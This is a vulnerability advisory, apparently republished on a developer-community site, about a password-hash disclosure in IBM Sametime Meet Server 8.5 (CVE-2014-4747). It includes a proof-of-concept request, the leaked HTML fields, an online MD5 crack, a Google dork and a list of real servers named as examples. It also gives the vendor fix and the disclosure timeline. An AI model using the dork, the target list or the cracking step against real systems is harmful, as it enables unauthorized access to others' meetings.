IBM Sametime Meet Server 8.5 Password Disclosure

简介: # Exploit Title: IBM Sametime Meet Server 8.
# Exploit Title:   IBM Sametime Meet Server 8.5 Password Disclosure
# Google Dork:     intitle:"Meeting Center - IBM Lotus Sametime"
# Date:     11/08/2014
# CVSS Score:     http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:L/AC:L/Au:N/C:P/I:N/A:N
# CVE-ID:     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4747
# OSVDB-ID:     http://osvdb.org/109443
#
# Author:     Adriano Marcio Monteiro
# E-mail:     adrianomarciomonteiro@gmail.com
# Blog:     http://www.brazucasecurity.com.br
#   
# Vendor:     http://www.ibm.com
# Software:     http://www.ibm.com/sametime
# Version:     8.5.1
# Advisory:     https://www-304.ibm.com/support/docview.wss?uid=swg21679221
#   
# Test Type:     Black Box
# Tested on:     Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m



Table of  Contents

[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography



[0x00] The Vulnerabilty

  Password Disclosure
  Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.



[0x01] Exploit Description

  On the page that allows editing a meeting is possible to retrieve the MD5 hash of the password of the meeting just by reading the HTML source code of the page.



[0x02] PoC - Proof of Concept

  For exploit this vulnerability you only need to analyze the source code of  page.
  
  http://sametime02.myserver.com.br/stconf.nsf/meeting/8635AEFF1CBFAAF283257D09004602CE?editdocument&1404305088536

  [...]
  <input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">
  <input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
  [...]

  http://www.md5online.org
  E1FAFFB3E614E6C2FBA74296962386B7 -> Found: AAA

  Examples:

      http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
      http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
      http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
      http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm
      http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm
      http://www.azi.com.br/stconf.nsf/frmConference?OpenForm
      http://aquila.sealinc.org/stconf.nsf/frmConference?Openform
      http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
      http://comware.net/stconf.nsf/frmConference?Openform
      https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm
      https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform
      http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
      https://mail.dba.uz/stconf.nsf/frmConference?Openform



[0x03] Correction or Workaround

  Apply the procedures described in the follow link:
  http://www-01.ibm.com/support/docview.wss?uid=swg21679454



[0x04] Timeline

  18/07/2014 - Vulnerabilities discovered
  19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team
  23/07/2014 - Advisory and troubleshooting fix published



[0x05] Published

  http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747
  http://www.securityfocus.com/bid/68823
 


[0x06] References

  Information Leakage
  https://www.owasp.org/index.php/Information_Leakage

  CWE-200: Information Exposure
  http://cwe.mitre.org/data/definitions/200.html



[0x07] Bibliography

  http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent



[end]
目录
相关文章
|
供应链 安全 IDE
IBM WebSphere Application Server Liberty 安全漏洞(CVE-2022-22475)
IBM WebSphere Application Server Liberty 安全漏洞(CVE-2022-22475)
|
Java Linux 应用服务中间件
linux系统安装IBM WebSphere Application Server(简称WAS)报错:JVM terminated. Exit code=1 ....
安装WAS报错: 错误贴出来: JVM terminated. Exit code=1 /mnt/hgfs/WAS_ND_V8.
2218 0
|
应用服务中间件 开发者
IBM WebSphere Application Server 8.5 Liberty Profile苗条瘦身之道初探及剖析
1.1 背景信息IBM WebSphere Application Server 向来以重量级而著称,而大量抛弃EJB这大巨头后,无论商用还是开源的应用服务器都走上轻量化的轨道。IBM也推出了IBM WebSphere Application Server Liberty Profile来应对并争取更大的开发者市场。但IBM WebSphere Application Server其他版本仍旧
1951 0
|
应用服务中间件
IBM WebSphere Application Server V6.1 Fix Pack 37于2011.04.04发布
IBM WebSphere Application Server V6.1 Fix Pack 37于2011.04.04发布 各个平台下载,请见: http://www.ibm.com/support/docview.wss?uid=swg24029204 详细修复列表,请见: http://www-01.ibm.com/support/docview.wss?uid=swg27007951#
1023 0
|
移动开发 Unix 网络协议
Vuln: IBM AIX FTP Server 'NLST' Command Information Disclosure Vulnerability
use IO::Socket; $|=1; print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ...
796 0
|
应用服务中间件
IBM WebSphere Application Server V7.0 Fix Pack 9于2010.03.25发布
IBM WebSphere Application Server V6.1 Fix Pack 29于2010.01.18发布 各个平台下载,请见: ftp://ftp.software.ibm.com/software/websphere/appserv/support/fixpacks/was70/cumulative/cf7009/ UpdateInstaller下载,请见:ftp://
1178 0
|
应用服务中间件
IBM WebSphere Application Server V6.1 Fix Pack 29于2010.01.18发布
IBM WebSphere Application Server V6.1 Fix Pack 29于2010.01.18发布 各个平台下载,请见: http://www.ibm.com/support/docview.wss?rs=180&amp;uid=swg24025185 详细修复列表,请见: http://www-01.ibm.com/support/docview.wss?rs=18
1035 0
|
应用服务中间件
IBM WebSphere Application Server V7.0 Fix Pack 7于2009.11.13发布
IBM WebSphere Application Server V7.0 Fix Pack 7于2009.11.13发布 关键字: ibm websphere was 7.0.0.7 IBM WebSphere Application Server V7.0 Fix Pack 7于2009.11.13发布 各个平台下载,请见: http://www.ibm.com/support/doc
1261 0
|
应用服务中间件
IBM WebSphere Application Server V6.1 Fix Pack 27于2009.09.21发布
IBM WebSphere Application Server V6.1 Fix Pack 27于2009.09.21发布   各个平台下载,请见: http://www.ibm.com/support/docview.wss?rs=180&amp;uid=swg24024195   详细修复列表,请见:http://www-01.ibm.com/support/docview.ws
946 0

热门文章

最新文章

下一篇
DataWorks